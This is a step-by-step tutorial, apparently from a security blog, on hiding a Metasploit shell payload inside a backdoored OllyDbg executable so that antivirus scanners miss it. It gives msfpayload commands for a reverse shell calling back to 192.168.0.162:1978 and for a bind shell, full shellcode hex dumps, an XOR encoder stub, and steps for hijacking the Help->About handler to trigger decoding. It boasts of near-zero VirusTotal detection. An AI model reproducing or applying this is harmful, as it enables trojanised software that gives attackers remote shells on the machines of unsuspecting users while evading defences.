Tricking AV Scanners

Introduction

This is a continuation of Backdooring PE Files article. We take off from the same binary that was backdoored. The idea now is to hide the malicious payload from AV detection. We will create a 2nd code cave to host the XOR stub, encode the 1st code cave that contained the msfpayload and then realign the stack and return the execution flow to its original position.

The trick here is not to execute the XOR encoder immediately when OllyDebug is run. Instead, we will choose a function inside it, when the user clicks on the 'Help->'About'-> Hyperlink button, the XOR stub will decode the msfpayload. This provides better AV bypass than executing XOR stub immediately. I scored 3/63 in virustotal! Meaning only 3 AVs detected my method :-)

Pre-requisite

1. Use cave_miner to identify a slack in the binary, we'll be using the second entry in the cave_miner output below:

# cave_miner search --size 700 OLLYDBG-04.exe

    /========\
   /    ||    \
        ||
        ||
        ||
   CAVE || MINER

[*] Starting cave mining process...
    Searching for bytes: 0x00...

[*] New cave detected !
  section_name: .data
  cave_begin:   0x000c9d4b
  cave_end:     0x000ca1b4
  cave_size:    0x00000469
  vaddress:     0x004caf4b
  infos:        Readable, Writeable, Contain initialized data

[*] New cave detected !
  section_name: .data
  cave_begin:   0x000caa39
  cave_end:     0x000cab3a
  cave_size:    0x00000101
  vaddress:     0x004cbc39
  infos:        Readable, Writeable, Contain initialized data

[*] Mining finished.

2. Note the original location of the 1st code cave in the earlier backdoored OllyDbg.exe. This is the location of the raw msfpayload:

Start: 00553000

End: 00553139

3.  We will use BT5 to generate reverse_shell payload, LPORT =1978, RHOST=192.168.0.162

msfpayload windows/shell_reverse_tcp LHOST=192.168.0.162 LPORT=1978 R > shell; hexdump -C shell | grep -v 0000013a |cut -d" " -f3-19|tr -d "(\n|'')"

fc e8 89 00 00 00 60 89  e5 31 d2 64 8b 52 30 8b52 0c 8b 52 14 8b 72 28  0f b7 4a 26 31 ff 31 c0ac 3c 61 7c 02 2c 20 c1  cf 0d 01 c7 e2 f0 52 578b 52 10 8b 42 3c 01 d0  8b 40 78 85 c0 74 4a 01d0 50 8b 48 18 8b 58 20  01 d3 e3 3c 49 8b 34 8b01 d6 31 ff 31 c0 ac c1  cf 0d 01 c7 38 e0 75 f403 7d f8 3b 7d 24 75 e2  58 8b 58 24 01 d3 66 8b0c 4b 8b 58 1c 01 d3 8b  04 8b 01 d0 89 44 24 245b 5b 61 59 5a 51 ff e0  58 5f 5a 8b 12 eb 86 5d68 33 32 00 00 68 77 73  32 5f 54 68 4c 77 26 07ff d5 b8 90 01 00 00 29  c4 54 50 68 29 80 6b 00ff d5 50 50 50 50 40 50  40 50 68 ea 0f df e0 ffd5 89 c7 68 c0 a8 00 a2  68 02 00 07 ba 89 e6 6a10 56 57 68 99 a5 74 61  ff d5 68 63 6d 64 00 89e3 57 57 57 31 f6 6a 12  59 56 e2 fd 66 c7 44 243c 01 01 8d 44 24 10 c6  00 44 54 50 56 56 56 4656 4e 56 56 53 56 68 79  cc 3f 86 ff d5 89 e0 4e56 46 ff 30 68 08 87 1d  60 ff d5 bb f0 b5 a2 5668 a6 95 bd 9d ff d5 3c  06 7c 0a 80 fb e0 75 05bb 47 13 72 6f 6a 00 53  ff d5

3a. Either way, you can also use BT5 to generate a bind_shell:

 msfpayload windows/shell_bind_tcp LPORT=1978 R > shell; hexdump -C shell | grep -v 00000155 |cut -d" " -f3-19|tr -d "(\n|'')"

fc e8 89 00 00 00 60 89  e5 31 d2 64 8b 52 30 8b52 0c 8b 52 14 8b 72 28  0f b7 4a 26 31 ff 31 c0ac 3c 61 7c 02 2c 20 c1  cf 0d 01 c7 e2 f0 52 578b 52 10 8b 42 3c 01 d0  8b 40 78 85 c0 74 4a 01d0 50 8b 48 18 8b 58 20  01 d3 e3 3c 49 8b 34 8b01 d6 31 ff 31 c0 ac c1  cf 0d 01 c7 38 e0 75 f403 7d f8 3b 7d 24 75 e2  58 8b 58 24 01 d3 66 8b0c 4b 8b 58 1c 01 d3 8b  04 8b 01 d0 89 44 24 245b 5b 61 59 5a 51 ff e0  58 5f 5a 8b 12 eb 86 5d68 33 32 00 00 68 77 73  32 5f 54 68 4c 77 26 07ff d5 b8 90 01 00 00 29  c4 54 50 68 29 80 6b 00ff d5 50 50 50 50 40 50  40 50 68 ea 0f df e0 ffd5 89 c7 31 db 53 68 02  00 07 ba 89 e6 6a 10 5657 68 c2 db 37 67 ff d5  53 57 68 b7 e9 38 ff ffd5 53 53 57 68 74 ec 3b  e1 ff d5 57 89 c7 68 756e 4d 61 ff d5 68 63 6d  64 00 89 e3 57 57 57 31f6 6a 12 59 56 e2 fd 66  c7 44 24 3c 01 01 8d 4424 10 c6 00 44 54 50 56  56 56 46 56 4e 56 56 5356 68 79 cc 3f 86 ff d5  89 e0 4e 56 46 ff 30 6808 87 1d 60 ff d5 bb f0  b5 a2 56 68 a6 95 bd 9dff d5 3c 06 7c 0a 80 fb  e0 75

4. This is the XOR STUB to encode, run it again and it will decode the payload. Pay attention to the start of the 1st code cave, the XOR key 0F, the end of the encoded address.

MOV EAX, 00553000          # Save start of encoding address in EAX, entry point

XOR BYTE PTR DS:[EAX],0F     # XOR the contents of EAX with XOR key 0F

INC EAX                                        # Increase EAX

CMP EAX, 00553139         # Have we reached the end enc. address?

JLE SHORT 004CAF54                 # If not, jump back to XOR command

The jump back to XOR command (004CAF54), is the address location of the XOR encoder: XOR BYTE PTR DS:[EAX],0F

Putting The Pieces Together

5. To trick the AV scanners, we should not trigger the decoder stub immediately but only when user clicks on a function in OllyDbg.exe such as Help->About->Hyperlink. To do this, we look for string text for reference in OllyDbg. In Immunity, Right Click->Search For-> All Reference Text Strings:

5a. Search for a text reference matching the function that you wish to hijack.

6. Secondly, we need to realign the entry point of OllyDbg to its natural flow since we had it modified earlier to jump directly to the 1st code cave. Below is the original entry point, which is what it's supposed to be.

7. The entry point to hijack is the 'About' function, which is located here:

00440CE2  |. 68 7F914B00    PUSH OLLYDBG-.004B917F 

00440CE7  |. 68 7A914B00    PUSH OLLYDBG-.004B917A                   

00440CEC  |. 8B45 08        MOV EAX,DWORD PTR SS:[EBP+8]            

00440CEF  |. 50             PUSH EAX                                 ; |hWnd

00440CF0  |. E8 4DE60600    CALL <JMP.&SHELL32.ShellExecuteA>     

8.  Now change this entry address to jump to the 2nd code cave addr (the XOR stub location as identified by cave_miner)

eg:

JMP 004CBC39

9. Go to the 2nd code cave entry and enter the XOR stub. Press Ctrl-G and enter 004CBC39

10.  At the end of the XOR stub, retype the entry point code(first 3 lines):

eg:

PUSH 004B917F                  

PUSH 004B917A

MOV EAX,DWORD PTR SS:[EBP+8]

PUSH EAX

10. Lastly, it is time to jump to the 2nd code cave where our evil payload is located. The first time you jump here it will encode(XOR) the msfpayload, the 2nd time you jump there it will decode itself.

eg:

JMP 00553000

11. Save changes to Ollydbg-05.exe.

12. Reopen it in Immunity.

13. This time, place a Breakpoint just before the XOR stub and Step Into the XOR function (Press F7) until it finishes encoding. If you follow Dump in the EAX counter, you can witness the payload slowly encode itself in the Dump Window on the lower left panel.

13. Copy the encodered contents; highlight the encoded payload contents and Copy Executable->Selected encoded lines and save it to a new OllyDbg.exe file.

14. Now, execute OllyDbg.exe without Immunity and it should decode itself! OllyDbg should open up, when you press Help->About->hyperlink, a bind shell should appear on port 1978 localhost.

15. Done, try to scan it against virustotal to see your score! I got 3/63! Which is pretty impressive :-)

References

http://www.securitynewspaper.com/2017/11/21/fully-undetectable-backdooring-pe-files/
https://haiderm.com/fully-undetectable-backdooring-pe-file/